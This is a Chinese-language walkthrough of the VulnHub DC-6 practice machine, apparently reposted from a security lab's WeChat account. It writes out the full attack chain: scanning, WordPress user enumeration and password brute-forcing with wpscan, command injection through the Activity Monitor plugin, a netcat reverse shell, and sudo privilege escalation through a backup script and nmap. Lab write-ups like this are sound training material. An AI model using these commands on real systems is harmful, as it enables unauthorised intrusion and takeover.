【VulnHub系列】DC-6-WordPress-nmap提权

admin 2022年10月18日08:03:13评论64 views字数 2034阅读6分46秒阅读模式
【VulnHub系列】DC-6-WordPress-nmap提权

【VulnHub系列】DC-6-WordPress-nmap提权



1



靶场部署

这个挑战的最终目标是获得root权限并阅读唯一的flag

vulnhub官网:https://www.vulnhub.com

下载地址:https://www.vulnhub.com/entry/dc-6,315/

1、直接从官网下载做好的虚拟机镜像文件(推荐下载Mirror版本);

2、解压会得到一个.ova的文件,然后在VMware中打开即可;




2



靶场演示


信息收集

靶机官网给出的两个线索需要去配置一下hosts文件


【VulnHub系列】DC-6-WordPress-nmap提权

Kali里面的密码本

【VulnHub系列】DC-6-WordPress-nmap提权

1.扫描局域网主机arp-scan -l

【VulnHub系列】DC-6-WordPress-nmap提权

2.端口探测nmap -sV -p- 192.168.75.158


【VulnHub系列】DC-6-WordPress-nmap提权


可以看到开放了22和80端口直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件Windows系统下在 C:windowssystem32driversetchosts打开后在末尾添加:192.168.75.158 wordyLinux系统下在/etc/hostsvim /etc/hosts#添加192.168.75.158 wordy现在访问即可

【VulnHub系列】DC-6-WordPress-nmap提权

是一个WordPress网站,Kali有专门的扫描工具wpscan3.目录扫描apt-get install dirsearchdirsearch -u http://192.168.75.158

【VulnHub系列】DC-6-WordPress-nmap提权

4.wpscan扫描用户wpscan --url http://wordy/  -e u找到五个用户

【VulnHub系列】DC-6-WordPress-nmap提权


爆破1、找到五个用户名:admin、graham、mark、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破(作者在vulnhub上给了个提示,为了减少暴力破解的时间,需要将包含“k01”的字符串从字典里筛选出来作为新字典用)vim dc-username.txt #将用户名放到其中gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目录解压密码本cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #将带有k01的密码导到dc-paswd.txt中2、使用wpscan来爆破wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt找到mark的密码为:helpdesk01

【VulnHub系列】DC-6-WordPress-nmap提权

登陆后台http://wordy/wp-login.php

【VulnHub系列】DC-6-WordPress-nmap提权

后台插件getshell1、利用Activity monitor插件的rce漏洞来getshell2、点击Activity monitor -> Tools

【VulnHub系列】DC-6-WordPress-nmap提权

3、执行命令的同时使用burp抓包,发送到repeater模块前端限制了只能填写15个字符,可以F12修改长度

【VulnHub系列】DC-6-WordPress-nmap提权

【VulnHub系列】DC-6-WordPress-nmap提权

【VulnHub系列】DC-6-WordPress-nmap提权

反弹shellKali终端上:nc -lvvp 4444burp抓包修改为:nc 192.168.75.150 4444 -e /bin/bash

【VulnHub系列】DC-6-WordPress-nmap提权

获取一个稳定一点的shell终端python -c 'import pty;pty.spawn("/bin/bash")'

【VulnHub系列】DC-6-WordPress-nmap提权

切换用户在/home/mark/stuff下发现一个文件,记录了用户graham的密码GSo7isUM1D4

【VulnHub系列】DC-6-WordPress-nmap提权

成功切换到graham用户下


【VulnHub系列】DC-6-WordPress-nmap提权


提权先查看一下有没有suid提权,没有再使用sudo -l看一下可执行的命令可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件

【VulnHub系列】DC-6-WordPress-nmap提权

查看一下脚本内容cat /home/jens/backups.sh我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了echo "/bin/bash" >> backups.sh


【VulnHub系列】DC-6-WordPress-nmap提权


然后以jens用户执行sudo -u jens ./backups.sh


【VulnHub系列】DC-6-WordPress-nmap提权


已经切换到jens用户再使用sudo -l查看一下可以执行的操作


【VulnHub系列】DC-6-WordPress-nmap提权


发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了echo 'os.execute("/bin/bash")' > shellsudo nmap --script=shell

【VulnHub系列】DC-6-WordPress-nmap提权

知识点总结

  • 信息收集

  • wpscan工具的使用,枚举用户名,爆破登录

  • WordPress插件activity monitor远程代码执行漏洞

  • NMAP 提权

【VulnHub系列】DC-6-WordPress-nmap提权


【VulnHub系列】DC-6-WordPress-nmap提权


免责声明

由于传播、利用本公众号NGC660安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号NGC600安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

原文始发于微信公众号(NGC660安全实验室):【VulnHub系列】DC-6-WordPress-nmap提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月18日08:03:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【VulnHub系列】DC-6-WordPress-nmap提权http://cn-sec.com/archives/1355893.html

发表评论

匿名网友 填写信息